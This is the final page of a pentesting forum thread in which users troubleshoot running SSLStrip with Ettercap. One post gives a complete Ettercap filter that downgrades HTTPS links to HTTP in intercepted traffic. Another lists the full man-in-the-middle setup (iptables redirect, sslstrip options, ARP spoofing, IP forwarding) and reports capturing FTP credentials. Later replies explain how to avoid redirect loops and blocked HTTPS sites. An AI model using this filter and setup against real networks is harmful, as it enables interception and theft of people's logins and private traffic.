Page 10 of 10 FirstFirst ... 8910
Results 91 to 97 of 97

Thread: SSLStrip & Ettercap not playing nicely together in BT5R1

  1. #91
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: SSLStrip & Ettercap not playing nicely together in BT5R1

    http://www.pentestit.com/update-ettercap-074/
    There you go. Don't know why I associated that with MS. I guess I got confused somewhere in my RSS feed.
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  2. #92
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: SSLStrip & Ettercap not playing nicely together in BT5R1

    http://www.pentestit.com/update-ettercap-074/
    There you go Don't know why I associated that with MS. I guess I got confused somewhere in my RSS feed.
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  3. #93
    Just burned his ISO
    Join Date
    Aug 2011
    Posts
    7

    Default Re: SSLStrip & Ettercap not playing nicely together in BT5R1

    An alternative to using sslstrip with ettercap.This ettercap filter (https downgrade)works.
    Code:
    ##########################
    ## Zap Content Encoding ##
    ##########################
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
    # note: replacement string is same length as original string
    msg("[HTTP Response Filter] Encoding zapped.\n");
       }
    }
    
    #####################
    ## Replace Content ##
    #####################
    
    ##
    # Requests
    if (ip.proto == TCP && tcp.dst == 80) {
      # msg("[HTTP Response Filter] HTTP request seen.\n");
       if (search(DECODED.data, "https")){
          replace("https", "http");
          msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
       }
       if (search(DATA.data, "https")){
          replace("https", "http");
          msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
       }
    }
    
    ##
    # Response
    if (ip.proto == TCP && tcp.src == 80) {
      # msg("[HTTP Response Filter] HTTP response seen.\n");
       if (search(DECODED.data, "https")){
          replace("https", "http");
          msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
       }
       if (search(DATA.data, "https")){
          replace("https", "http");
          msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
       }
    }

  4. #94
    Senior Member
    Join Date
    Dec 2010
    Posts
    127

    Default Re: SSLStrip & Ettercap not playing nicely together in BT5R1

    @DeserTEagLe Good work there on that filter. Quick question, what happens if the server doesn't accept the downgrade, is the user prevented from hitting the HTTPS site?

    Meaning, when SSLStrip & Eettercap work together, if sslstrip can't downgrade to http, traffic still passes over 443 and the victim is presented with the ettercap certificate to accept. Does this work the same way?

    It seems the traffic would be blocked to https. So http sites that redirect to https automatically may end up in an infinite loop.

    What do you think?

  5. #95
    Just burned his ISO
    Join Date
    Aug 2011
    Posts
    7

    Default Re: SSLStrip & Ettercap not playing nicely together in BT5R1

    It seems the traffic would be blocked to https. So http sites that redirect to https automatically may end up in an infinite loop.

    What do you think?
    Sometimes you may have to comment one leg (request / response) out of the filtering or you will get redirection loops (like while tampering Facebook connections). Also, if the request is already under https, you won’t be able to filter it

  6. #96
    Just burned their ISO
    Join Date
    Mar 2012
    Posts
    2

    Default Re: SSLStrip & Ettercap not playing nicely together in BT5R1

    Hello everyone,
    for some reason i cant seem to get this working
    i am running BT5R2, i edit my /etc/etter.conf file.
    enter this ip route line: "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000"
    i start sslstrip -a -k -f
    use arpspoof
    run ettercap (version 0.7.4.1)
    set ip_forward to 1

    when i test it with my test pc and i go to a ftp server it works, i get the username\pw
    but when i go to mail.google.com or paypal.com i get a ssl error site.

    1 thing I notice is when i do iptables -L i see 3 chains (input\forward\output) nothing more.

    any advice would be appreciated !

  7. #97
    Senior Member
    Join Date
    Dec 2010
    Posts
    127

    Default Re: SSLStrip & Ettercap not playing nicely together in BT5R1

    Why are you running ettercap & Arpspoof? Ettercap can do MiTM. Also, to ensure ettercap is using the proper conf file I use the -a switch ( -a /etc/etter.conf) just to be sure

    What browser are you using? It seems chrome has extra security measures to protect against MiTM in my experience.

    Here's what I would do, make sure you installed easy-creds during the R2 upgrade and then use that to see if it works.

Page 10 of 10 FirstFirst ... 8910

Similar Threads

  1. Ettercap+Sslstrip
    By ms282 in forum BackTrack 5 General Topics
    Replies: 22
    Last Post: 03-08-2012, 10:45 AM
  2. Problema con Ettercap & Sslstrip
    By mapoetto in forum Discussioni Generali
    Replies: 1
    Last Post: 04-14-2011, 10:30 PM
  3. Ettercap and Sslstrip problem
    By f4llcon in forum Beginners Forum
    Replies: 5
    Last Post: 11-02-2010, 05:26 PM
  4. ettercap & sslstrip question
    By mroy1300 in forum OLD Newbie Area
    Replies: 0
    Last Post: 02-01-2010, 01:55 AM
  5. playing whit ettercap remote_brower
    By Jon3s in forum OLD Tutorials and Guides
    Replies: 0
    Last Post: 03-23-2008, 11:22 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •